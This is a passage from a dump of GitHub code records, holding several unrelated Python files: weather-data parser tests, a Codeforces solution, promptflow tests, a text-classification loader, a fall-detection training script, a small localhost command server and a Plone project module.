\n","repo_name":"compf/uos_measurement_project","sub_path":"api_data_comp.py","file_name":"api_data_comp.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25531469159","text":"\"\"\"Test cases for responses\"\"\"\nimport unittest\nfrom jma.response import JmaIrradiationResponse, JmaHourlyIrradiationResponse\n\nclass TestJmaIrradiationResponse(unittest.TestCase):\n def setUp(self):\n self.csv_data = '''ダウンロードした时刻:2021/01/10 15:53:37\n\n,福冈,佐贺,长崎\n,合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡)\n2021年1月1日,2.53,6.95,5.71\n2021年1月2日,1.07,3.56,4.54\n2021年1月3日,11.01,11.68,10.94\n2021年1月4日,12.33,12.31,11.71\n2021年1月5日,6.30,5.02,5.27\n2021年1月6日,5.45,5.58,5.04\n'''\n self.csv_data_with_lta = '''ダウンロードした时刻:2021/01/11 00:34:52\n\n,盛冈,盛冈,秋田,秋田\n,合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡)\n,,平年値(MJ/㎡),,平年値(MJ/㎡)\n2021年1月1日,4.01,5.9,2.46,4.0\n2021年1月2日,8.16,5.9,2.44,4.0\n'''\n\n self.csv_data_incomplete = '''ダウンロードした时刻:2021/01/10 23:54:52\n\n,山口,山口,松江,松江\n,合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡)\n,,平年値(MJ/㎡),,平年値(MJ/㎡)\n2021年1月1日,,,5.85,\n2021年1月2日,,,3.58,\n'''\n\n def test_parse_headers(self):\n response = JmaIrradiationResponse(self.csv_data)\n expected = ['Date', 'Fukuoka', 'Saga', 'Nagasaki']\n self.assertListEqual(expected, response.headers)\n\n def test_parse_headers_lta(self):\n response = JmaIrradiationResponse(self.csv_data_with_lta)\n expected = ['Date', 'Morioka', 'Morioka_LT', 'Akita', 'Akita_LT']\n self.assertListEqual(expected, response.headers)\n\n \n def test_parse_data(self):\n response = JmaIrradiationResponse(self.csv_data)\n expected = [\n [2.53, 6.95, 5.71],\n [1.07, 3.56, 4.54],\n [11.01, 11.68, 10.94],\n [12.33, 12.31, 11.71],\n [6.30, 5.02, 5.27],\n [5.45, 5.58, 5.04],\n 
]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Fukuoka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Saga'], expected[i][1], 3)\n self.assertAlmostEqual(row['Nagasaki'], expected[i][2], 3)\n\n def test_parse_data_lta(self):\n response = JmaIrradiationResponse(self.csv_data_with_lta)\n expected = [\n [4.01, 5.9, 2.46, 4.0],\n [8.16, 5.9, 2.44, 4.0],\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Morioka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Morioka_LT'], expected[i][1], 3)\n self.assertAlmostEqual(row['Akita'], expected[i][2], 3)\n self.assertAlmostEqual(row['Akita_LT'], expected[i][3], 3)\n \n def test_parse_data_kwh(self):\n response = JmaIrradiationResponse(self.csv_data, kwh=True)\n expected = [\n [0.70277, 1.930555555, 1.58611],\n [0.29722, 0.988888, 1.2611],\n [3.058333, 3.2444, 3.0388],\n [3.425, 3.41944, 3.2527],\n [1.75, 1.39444, 1.46388],\n [1.513888, 1.55, 1.4]\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Fukuoka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Saga'], expected[i][1], 3)\n self.assertAlmostEqual(row['Nagasaki'], expected[i][2], 3)\n\n def test_parse_data_lta_kwh(self):\n response = JmaIrradiationResponse(self.csv_data_with_lta, kwh=True)\n expected = [\n [1.113888, 1.638888, 0.68333, 1.11111],\n [2.266666, 1.638888, 0.67777, 1.11111],\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Morioka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Morioka_LT'], expected[i][1], 3)\n self.assertAlmostEqual(row['Akita'], expected[i][2], 3)\n self.assertAlmostEqual(row['Akita_LT'], expected[i][3], 3)\n\n def test_parse_dates(self):\n response = JmaIrradiationResponse(self.csv_data)\n dates = [row['Date'] for row in response.csv]\n for i, date in enumerate(dates):\n self.assertEqual(f'2021-01-{i+1:02}', date)\n\n def test_parse_data_incomplete_kwh(self):\n response = JmaIrradiationResponse(self.csv_data_incomplete, kwh=True)\n row0 = response.csv[0]\n row1 = response.csv[1]\n self.assertAlmostEqual(row0['Matsue'], 1.624999, 3)\n self.assertAlmostEqual(row1['Matsue'], 0.994444, 3)\n self.assertIsNone(row0['Matsue_LT'])\n self.assertIsNone(row1['Matsue_LT'])\n self.assertIsNone(row0['山口'])\n self.assertIsNone(row1['山口'])\n self.assertIsNone(row0['山口_LT'])\n self.assertIsNone(row1['山口_LT'])\n\n\nclass TestJmaHourlyIrradiationResponse(unittest.TestCase):\n def setUp(self):\n self.csv_data = '''ダウンロードした时刻:2021/03/24 21:40:23\n\n,青森\n,日射量(MJ/�u)\n2021年3月22日1时,--\n2021年3月22日2时,--\n2021年3月22日3时,--\n2021年3月22日4时,--\n2021年3月22日5时,--\n2021年3月22日6时,0.00\n2021年3月22日7时,0.08\n2021年3月22日8时,0.42\n2021年3月22日9时,0.70\n2021年3月22日10时,0.59\n2021年3月22日11时,1.03\n2021年3月22日12时,1.56\n2021年3月22日13时,0.58\n2021年3月22日14时,0.46\n2021年3月22日15时,0.42\n2021年3月22日16时,0.30\n2021年3月22日17时,0.37\n2021年3月22日18时,0.08\n2021年3月22日19时,0.00\n2021年3月22日20时,--\n2021年3月22日21时,--\n2021年3月22日22时,--\n2021年3月22日23时,--\n2021年3月22日24时,--\n'''\n\n def test_parse_times(self):\n response = JmaHourlyIrradiationResponse(self.csv_data)\n for hour in range(24):\n row = response.csv[hour]\n self.assertEqual(f'2021-03-22 {hour:02}:00', row['Date'])\n\n def test_parse_values(self):\n response = JmaHourlyIrradiationResponse(self.csv_data)\n expected = [None, None, None, None, None, 0.00, 0.08, 0.42, 0.70, 0.59, 1.03, 1.56,\n 0.58, 0.46, 0.42, 0.30, 0.37, 0.08, 0.00, None, None, None, None, None]\n\n for i, row in enumerate(response.csv):\n actual = row['Aomori']\n if actual is None:\n 
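# editor's note: '--' placeholders in the CSV fixture parse to None, so the\n                # night-time hours must be None on both the actual and expected side\n                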
self.assertIsNone(expected[i])\n else:\n self.assertAlmostEqual(expected[i], actual)\n","repo_name":"dliberat/jma-client","sub_path":"jma/tests/test_response.py","file_name":"test_response.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878885608","text":"#link: https://codeforces.com/problemset/problem/1350/A\n#author: Mohamed Ibrahim\n\nt=int(input())\nfor i in range(t):\n\tn,k=map(int,input().split())\n\tans=0\n\tfor i in range(2,n+1):\n\t\tif(n%i==0):\n\t\t\tans=i\n\t\t\tbreak;\n\tprint(n+ans+(k-1)*2)\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"CodeForces/Orac and Factors.py","file_name":"Orac and Factors.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"33461842022","text":"\"\"\"Tests for helper classes.\"\"\"\nimport unittest\n\nimport xmlschema\n\nfrom metadata_backend.conf.conf import schema_types\nfrom metadata_backend.helpers.schema_loader import JSONSchemaLoader, SchemaNotFoundException, XMLSchemaLoader\n\n\nclass TestXMLSchemaLoader(unittest.TestCase):\n \"\"\"Test schema loader.\"\"\"\n\n def test_XMLSchemaLoader_returns_xmlschema_object(self):\n \"\"\"Test XMLSchemaLoader return type is correct.\"\"\"\n schema_name = \"submission\"\n schemaloader = XMLSchemaLoader()\n schema = schemaloader.get_schema(schema_name)\n self.assertIs(type(schema), xmlschema.XMLSchema)\n\n def test_XMLSchemaLoader_raises_error_with_nonexistent_schema(self):\n \"\"\"Test non-existent schemas is reported as error.\"\"\"\n schema_name = \"NULL\"\n schemaloader = XMLSchemaLoader()\n self.assertRaises(SchemaNotFoundException, schemaloader.get_schema, schema_name)\n\n\nclass TestJSONSchemaLoader(unittest.TestCase):\n \"\"\"Test schema loader.\"\"\"\n\n def test_JSONSchemaLoader_returns_xmlschema_object(self):\n \"\"\"Test JSONSchemaLoader return type is correct.\"\"\"\n schema_name = \"study\"\n schemaloader = JSONSchemaLoader()\n schema = schemaloader.get_schema(schema_name)\n self.assertIs(type(schema), dict)\n\n def test_JSONSchemaLoader_raises_error_with_nonexistent_schema(self):\n \"\"\"Test non-existent schemas is reported as error.\"\"\"\n schema_name = \"NULL\"\n schemaloader = JSONSchemaLoader()\n self.assertRaises(SchemaNotFoundException, schemaloader.get_schema, schema_name)\n\n\nclass TestAllDefinedSchemasExist(unittest.TestCase):\n \"\"\"Test that all defined schemas exist.\"\"\"\n\n def test_schemas_exist(self):\n \"\"\"Test that all defined schemas have their schema definition.\"\"\"\n schema_loader = JSONSchemaLoader()\n for schema_name in schema_types.keys():\n if schema_name in {\"project\", \"datacite\"}:\n continue\n schema = schema_loader.get_schema(schema_name)\n self.assertIs(type(schema), dict)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"CSCfi/metadata-submitter","sub_path":"tests/unit/test_schema_loader.py","file_name":"test_schema_loader.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74010800809","text":"#!/usr/bin/env python\nimport socket\n\nfrom variableDef import variableAssign, list\n\nfrom expressions import doMath\n\nTCP_IP = '127.0.0.1'\nTCP_PORT = 5005 #port our app will listen on\nBUFFER_SIZE = 100 #the max size of the command by the user\n\n#starts up server with the correct specifications\ns = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((TCP_IP, TCP_PORT))\ns.listen(1)\n\nconn, addr = s.accept()\nprint ('Connection address:', addr)\n\n#server will stay up as long as user is connected, and will stop on disconnect (can change it if you would like)\nwhile 1:\n senddata = True\n data = conn.recv(BUFFER_SIZE)\n data1 = data.strip()\n if not data: break\n print (\"received data:\", data)\n #checks to see if user inputed an existing variable to see value\n for obj in list:\n #print(\"test\")\n if data1 == obj.name:\n conn.send(obj.value + \"\\n\")\n senddata = False\n #checks to see if the user inputed availible commands\n if data1.lower() == 'author':\n conn.send('Oliver Fay\\n')\n elif data1.lower() == 'hello':\n conn.send('world\\n')\n elif data1.lower() == 'help':\n conn.send('This is my command line tool\\nTo find out the author type: Author\\nTo get a response type: Hello\\nTo assign variables use the format = \\nTo perform mathmatical exprestions separate your numbers with +, -, *, /, **\\n')\n elif data1.lower() == 'oliver':\n conn.send('you did it\\n')\n elif not data1.find('=') == -1:\n conn.send(variableAssign(data1))\n #will run the command as a math expression if nothing else is outputed\n elif senddata:\n #print(\"test3\")\n conn.send(doMath(data1))\n #conn.send(data1 + '\\n') # echo","repo_name":"OFay41/checkWritersTechnical","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73368084968","text":"from suffix_trees import STree\nimport re\n\ndef load_file(file_name):\n f = open(file_name)\n # lines = re.findall(r\"'''\\s*(\\w+)\\s*'''\", f.read())\n lines = f.readlines()\n f.close()\n return lines\n\nlines = load_file('test2.txt')\nlcs_str = STree.STree(lines)\nprint(lcs_str.lcs())","repo_name":"Anastasiya-Safrygina/Lab-4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70350555367","text":"import logging\nfrom pathlib import Path\nfrom types import GeneratorType\n\nimport pytest\n\nfrom promptflow._sdk._constants import LOGGER_NAME\nfrom promptflow._sdk._pf_client import PFClient\nfrom promptflow.exceptions import UserErrorException\n\nPROMOTFLOW_ROOT = Path(__file__) / \"../../../..\"\n\nTEST_ROOT = Path(__file__).parent.parent.parent\nMODEL_ROOT = TEST_ROOT / \"test_configs/e2e_samples\"\nCONNECTION_FILE = (PROMOTFLOW_ROOT / \"connections.json\").resolve().absolute().as_posix()\nFLOWS_DIR = (TEST_ROOT / \"test_configs/flows\").resolve().absolute().as_posix()\nFLOW_RESULT_KEYS = [\"category\", \"evidence\"]\n\n_client = PFClient()\n\n\n@pytest.mark.usefixtures(\"use_secrets_config_file\", \"setup_local_connection\", \"install_custom_tool_pkg\")\n@pytest.mark.sdk_test\n@pytest.mark.e2etest\nclass TestFlowTest:\n def test_pf_test_flow(self):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n flow_path = Path(f\"{FLOWS_DIR}/web_classification\").absolute()\n\n result = _client.test(flow=flow_path, inputs=inputs)\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n def test_pf_test_flow_with_custom_strong_type_connection(self, install_custom_tool_pkg):\n # Need to reload 
pkg_resources to get the latest installed tools\n import importlib\n\n import pkg_resources\n\n importlib.reload(pkg_resources)\n\n inputs = {\"text\": \"Hello World!\"}\n flow_path = Path(f\"{FLOWS_DIR}/custom_strong_type_connection_basic_flow\").absolute()\n\n # Test that connection would be custom strong type in flow\n result = _client.test(flow=flow_path, inputs=inputs)\n assert result == {\"out\": \"connection_value is MyFirstConnection: True\"}\n\n # Test that connection\n result = _client.test(flow=flow_path, inputs={\"input_text\": \"Hello World!\"}, node=\"My_Second_Tool_usi3\")\n assert result == \"Hello World!This is my first custom connection.\"\n\n def test_pf_test_with_streaming_output(self):\n flow_path = Path(f\"{FLOWS_DIR}/chat_flow_with_stream_output\")\n result = _client.test(flow=flow_path)\n chat_output = result[\"answer\"]\n assert isinstance(chat_output, GeneratorType)\n assert \"\".join(chat_output)\n\n flow_path = Path(f\"{FLOWS_DIR}/basic_with_builtin_llm_node\")\n result = _client.test(flow=flow_path)\n chat_output = result[\"output\"]\n assert isinstance(chat_output, str)\n\n def test_pf_test_node(self):\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n flow_path = Path(f\"{FLOWS_DIR}/web_classification\").absolute()\n\n result = _client.test(flow=flow_path, inputs=inputs, node=\"convert_to_dict\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n def test_pf_test_flow_with_variant(self):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n\n result = _client.test(\n flow=f\"{FLOWS_DIR}/web_classification\", inputs=inputs, variant=\"${summarize_text_content.variant_1}\"\n )\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n @pytest.mark.skip(\"TODO this test case failed in windows and Mac\")\n def test_pf_test_with_additional_includes(self, caplog):\n with caplog.at_level(level=logging.WARNING, logger=LOGGER_NAME):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification_with_additional_include\", inputs=inputs)\n duplicate_file_content = \"Found duplicate file in additional includes\"\n assert any([duplicate_file_content in record.message for record in caplog.records])\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification\", inputs=inputs, node=\"convert_to_dict\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n # Test additional includes don't exist\n with pytest.raises(ValueError) as e:\n _client.test(flow=f\"{FLOWS_DIR}/web_classification_with_invalid_additional_include\")\n assert \"Unable to find additional include ../invalid/file/path\" in str(e.value)\n\n def test_pf_flow_test_with_symbolic(self, prepare_symbolic_flow):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification_with_additional_include\", inputs=inputs)\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification\", inputs=inputs, node=\"convert_to_dict\")\n assert all([key in FLOW_RESULT_KEYS 
for key in result])\n\n def test_pf_flow_test_with_exception(self, capsys):\n # Test flow with exception\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n flow_path = Path(f\"{FLOWS_DIR}/web_classification_with_exception\").absolute()\n\n with pytest.raises(UserErrorException) as exception:\n _client.test(flow=flow_path, inputs=inputs)\n assert \"Execution failure in 'convert_to_dict': (Exception) mock exception\" in str(exception.value)\n\n # Test node with exception\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n with pytest.raises(Exception) as exception:\n _client.test(flow=flow_path, inputs=inputs, node=\"convert_to_dict\")\n output = capsys.readouterr()\n assert \"convert_to_dict.py\" in output.out\n assert \"mock exception\" in str(exception.value)\n\n def test_node_test_with_connection_input(self):\n flow_path = Path(f\"{FLOWS_DIR}/basic-with-connection\").absolute()\n inputs = {\n \"connection\": \"azure_open_ai_connection\",\n \"hello_prompt.output\": \"Write a simple Hello World! \"\n \"program that displays the greeting message when executed.\",\n }\n result = _client.test(\n flow=flow_path,\n inputs=inputs,\n node=\"echo_my_prompt\",\n environment_variables={\"API_TYPE\": \"${azure_open_ai_connection.api_type}\"},\n )\n assert result\n\n def test_pf_flow_with_aggregation(self):\n flow_path = Path(f\"{FLOWS_DIR}/classification_accuracy_evaluation\").absolute()\n inputs = {\"variant_id\": \"variant_0\", \"groundtruth\": \"Pdf\", \"prediction\": \"PDF\"}\n result = _client._flows._test(flow=flow_path, inputs=inputs)\n assert \"calculate_accuracy\" in result.node_run_infos\n assert result.run_info.metrics == {\"accuracy\": 1.0}\n\n def test_pf_test_with_non_english_input(self):\n result = _client.test(flow=f\"{FLOWS_DIR}/flow_with_non_english_input\")\n assert result[\"output\"] == \"Hello 日本語\"\n","repo_name":"Indie365/promptflow","sub_path":"src/promptflow/tests/sdk_cli_test/e2etests/test_flow_test.py","file_name":"test_flow_test.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5151445469","text":"\nimport os\nimport re\nimport jieba\nimport time\nimport numpy as np\n\njieba.enable_parallel() # jieba支持多进程\n\ntoken = \"[0-9\\s+\\.\\!\\/_,$%^*()?;;:【】+\\\"\\'\\[\\]\\\\]+|[+——!,;:。?《》、~@#¥%……&*()“”.=-]+\"\nlabels_index = {} # 记录分类标签的序号\nstopwords = set(open('dict/stop_words.txt', encoding='utf-8').read().split()) # 停用词\n\n\n# for scikit part\n\ndef preprocess(text):\n text1 = re.sub(' ', ' ', text)\n str_no_punctuation = re.sub(token, ' ', text1) # 去掉标点\n text_list = list(jieba.cut(str_no_punctuation)) # 分词列表\n text_list = [item for item in text_list if item != ' '] # 去掉空格\n return ' '.join(text_list)\n\n\ndef load_datasets():\n # should run corpus_split.py first\n\n base_dir = 'data/'\n X_data = {'train':[], 'test':[]}\n y = {'train':[], 'test':[]}\n for type_name in ['train', 'test']:\n corpus_dir = os.path.join(base_dir, type_name)\n for label in os.listdir(corpus_dir):\n label_dir = os.path.join(corpus_dir, label)\n file_list = os.listdir(label_dir)\n print(\"label: {}, len: {}\".format(label, len(file_list)))\n\n for fname in file_list:\n file_path = os.path.join(label_dir, fname)\n with open(file_path, encoding='gb2312', errors='ignore') as text_file:\n text_content = preprocess(text_file.read())\n X_data[type_name].append(text_content)\n 
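# one label appended per document read, keeping y index-aligned with X_data\n                    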
y[type_name].append(label)\n\n print(\"{} corpus len: {}\\n\".format(type_name, len(X_data[type_name])))\n \n return X_data['train'], y['train'], X_data['test'], y['test']\n\n\n# for keras part\n\ndef preprocess_keras(text):\n text1 = re.sub(' ', ' ', text)\n str_no_punctuation = re.sub(token, ' ', text1) # 去掉标点\n text_list = list(jieba.cut(str_no_punctuation)) # 分词列表\n text_list = [item for item in text_list if item != ' ' and item not in stopwords] # 去掉空格和停用词\n return ' '.join(text_list)\n\n\ndef load_raw_datasets(): \n labels = []\n texts = []\n base_dir = 'CN_Corpus/SogouC.reduced/Reduced'\n t1 = time.time()\n for cate_index, label in enumerate(os.listdir(base_dir)):\n label_dir = os.path.join(base_dir, label)\n file_list = os.listdir(label_dir)\n labels_index[label] = cate_index # 记录分类标签的整数标号\n print(\"label: {}, len: {}\".format(label, len(file_list)))\n\n for fname in file_list:\n f = open(os.path.join(label_dir, fname), encoding='gb2312', errors='ignore')\n texts.append(preprocess_keras(f.read()))\n f.close()\n labels.append(labels_index[label])\n \n t2 = time.time()\n tm_cost = t2-t1\n print('\\nDone. {} total categories, {} total docs. cost {} seconds.'.format(len(os.listdir(base_dir)), len(texts), tm_cost))\n return texts, labels\n\ndef load_pre_trained():\n # load pre-trained embedding model\n embeddings_index = {}\n with open('Embedding/sgns.sogou.word') as f:\n _, embedding_dim = f.readline().split() \n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\n print('Found %s word vectors, dimension %s' % (len(embeddings_index), embedding_dim))\n return embeddings_index","repo_name":"lijqhs/text-classification-cn","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"53"} +{"seq_id":"37776661199","text":"import pandas as pd\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import Sequential\nimport torch.optim as optim\nfrom random import shuffle\n\n\ndef get_data(file):\n inputs = []\n labels = []\n with open(file) as file:\n df = pd.read_csv(file, header=None)\n x = df.iloc[:, 1:].values\n y = df.iloc[:, 0].values\n for i in range(len(x)):\n inputs.append(x[i])\n for j in range(len(y)):\n a = []\n if(y[j]==\"fall\"):\n y[j]=1\n else:\n y[j]=0\n a.append(y[j])\n labels.append(a)\n return inputs,labels\n\ninputs,outputs=get_data(\"data/fall_vs_up.csv\")\nprint(inputs[1])\nprint(outputs[1])\n\n\nclass MLP(nn.Module):\n def __init__(self):\n super(MLP, self).__init__()\n self.fc = Sequential(\n nn.Linear(99, 10),\n nn.ReLU(),\n nn.Linear(10,2)\n )\n\n def forward(self, x):\n x = self.fc(x)\n return x\n\nmodel=MLP()\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=1e-4)\n# optimizer = optim.SGD(model.parameters(), lr=1e-4, momentum=0.9)\nEPOCH = 50\n\nfor epoch in range(EPOCH):\n step = 0\n loss_one = 0\n list_shuffle = [i for i in range(len(inputs))]\n shuffle(list_shuffle)\n for i in list_shuffle:\n train_loss = 0\n x = inputs[i]\n y = outputs[i]\n y = torch.tensor(y)\n x = torch.tensor(x).unsqueeze(0).to(torch.float32)\n output = model(x)\n loss = criterion(output, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n\n train_loss = train_loss / len(inputs)\n\n print('Epoch: {} \\t Training Loss:{:.6f}'.format(epoch + 1, 
train_loss))\n\ntorch.save(model.state_dict(),\"checkpoint/fall_vs_up_dict.pth\")","repo_name":"tuyenldhust/Fall_Detection","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"16504870297","text":"import pytest\nfrom tests.context import cli\n\n\n@pytest.fixture(scope=\"module\")\ndef parser():\n    return cli.make_parser()\n\n\ndef test_cli_parse_args(parser):\n    argvs = [\n        [],\n        [\"-v\"],\n        [\"-vv\"],\n        [\"-q\"],\n        [\"interactive\"],\n        [\"list\"],\n        [\"-v\", \"list\"],\n        [\"-vv\", \"list\"],\n        [\"report\"],\n        [\"update\"],\n        [\"update\", \"-S\", \"T\", \"100\", \"1/3/2020\"],\n        [\"update\", \"-A\", \"T\", \"100\", \"1/4/2020\"],\n        [\"update\", \"-R\", \"T\", \"100\", \"1/5/2020\"],\n    ]\n    for argv in argvs:\n        assert parser.parse_args(argv)\n\n\ndef test_cli_interactive(parser):\n    pass\n\n\ndef test_cli_list(parser, sample_portfolio):\n    argv = [\"list\"]\n    args = parser.parse_args(argv)\n    assert callable(args.func)\n    assert args.verbosity == 0\n    assert args.func(args, sample_portfolio) == \"\\t\".join(\n        sample_portfolio.holdings.columns\n    )\n\n\ndef test_cli_report(parser, sample_portfolio):\n    argv = [\"report\"]\n    args = parser.parse_args(argv)\n    assert args.verbosity == 1\n    assert not args.email\n    assert callable(args.func)\n    # assert type(args.func(args, sample_portfolio)) == report.Report\n\n\ndef test_cli_update(parser):\n    pass\n","repo_name":"ThomasStivers/portfolio","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21822021075","text":"from zope import interface\nfrom zope.interface import implements\nfrom zope.component import getUtility\n\nfrom archetypes.schemaextender.interfaces import ISchemaExtender\nfrom archetypes.schemaextender.field import ExtensionField\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.Archetypes import public as atapi\n\nfrom p4a.subtyper import ISubtyper, interfaces as stifaces\n\nfrom bit.plone.fraglets.interfaces import IFolderResults\nfrom bit.plone.project.interfaces\\\n    import IProject, IProjectContacts, IProjectInfo,\\\n    IProjectNews, IProjectLinks, IProjectEvents, IProjectMedia,\\\n    IProjectPartners\nfrom bit.plone.project.subtypes.interfaces\\\n    import IProjectSubtype,\\\n    IProjectNewsSubtype, IProjectLinksSubtype,\\\n    IProjectEventsSubtype, IProjectPartnersSubtype\n\n\nclass ExStringField(ExtensionField, atapi.StringField):\n    \"\"\"A trivial field.\"\"\"\n\n\nclass ExTextField(ExtensionField, atapi.TextField):\n    \"\"\"A trivial field.\"\"\"\n\n\nclass ExLinesField(ExtensionField, atapi.LinesField):\n    \"\"\"A trivial field.\"\"\"\n\nproject_fields = [\n    ExStringField(\n        \"project_status\",\n        default='active',\n        mode='rw',\n        read_permission='zope.View',\n        write_permission='cmf.ModifyPortalContent',\n        vocabulary_factory='bit.plone.project.vocabulary.ProjectStatus',\n        widget=atapi.SelectionWidget(\n            label='Project Status',\n            label_msgid='label_project_status',\n            description=\"Please enter the primary \"\\\n                + \"STATUS for this project, leave blank to use this STATUS\",\n            description_msgid='help_project_status',\n            i18n_domain='plone',\n            ),\n        ),\n    ExLinesField(\n        \"project_features\",\n        default='',\n        mode='rw',\n        read_permission='zope.View',\n        write_permission='cmf.ModifyPortalContent',\n        widget=atapi.LinesWidget(\n
label='Project features',\n label_msgid='label_project_features',\n description=\"Please enter the paths \"\\\n + \"to featured content for this project\",\n description_msgid='help_project_features',\n i18n_domain='plone',\n ),\n ),\n ]\n\n\nclass ProjectExtender(object):\n implements(ISchemaExtender)\n fields = project_fields\n\n def __init__(self, context):\n self.context = context\n\n def getFields(self):\n return self.fields\n\n\nclass Project(object):\n implements(IProject)\n\n def __init__(self, context):\n self.context = context\n\n def __eq__(self, other):\n if self.context == other.context:\n return True\n return False\n\n def get_uid(self):\n return self.context.UID()\n uid = property(get_uid)\n\n def get_id(self):\n return self.context.getId()\n id = property(get_id)\n\n def get_title(self):\n return self.context.Title()\n\n def set_title(self, title):\n return self.context.setTitle(title)\n title = property(get_title, set_title)\n\n def get_project_folder(self, folderid):\n if hasattr(self.context, folderid):\n # this should return an adapted folder...\n return self.context[folderid]\n\n def get_project_folders(self, non_empty=False):\n portal_catalog = getToolByName(self.context, 'portal_catalog')\n catalog_results = portal_catalog.searchResults(\n show_inactive=False,\n show_all=False,\n exclude_from_nav=False)\n for folder in [\n x for x\n in portal_catalog.searchResults(\n is_folderish=True,\n exclude_from_nav=False,\n path={\n 'query': self.get_path(),\n 'depth': 1},\n sort_on='getObjPositionInParent')\n ]:\n if non_empty:\n has_children = [\n x.getPath() for x\n in catalog_results\n if not x.getPath() == folder.getPath()\n and x.getPath().startswith(folder.getPath())\n and not '/' in x.getPath().split(\n folder.getPath())[1].lstrip('/')]\n if has_children:\n yield folder.getId\n else:\n yield folder.getId\n\n def get_project_status(self):\n project_status = self.context.Schema(\n )['project_status'].get(self.context)\n return project_status\n\n def set_project_status(self, status):\n self.context.Schema(\n )['project_status'].set(self.context, status)\n status = property(get_project_status, set_project_status)\n\n def get_path(self):\n return '/'.join(self.context.getPhysicalPath())\n path = property(get_path)\n\n def get_info(self):\n return IProjectInfo(self.context)\n info = property(get_info)\n\n def get_media(self):\n return IProjectMedia(self.context)\n media = property(get_media)\n\n def add_contacts_folder(self):\n if not 'contacts' in self.context:\n self.context.invokeFactory('Folder', 'contacts')\n if not IProjectContacts(self.context['contacts'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['contacts'],\n 'bit.plone.project.ProjectContacts')\n self.context['contacts'].setTitle('Contacts')\n\n def add_news_folder(self):\n if not 'news' in self.context:\n self.context.invokeFactory('Folder', 'news')\n if not IProjectNews(self.context['news'], None):\n subtyper = 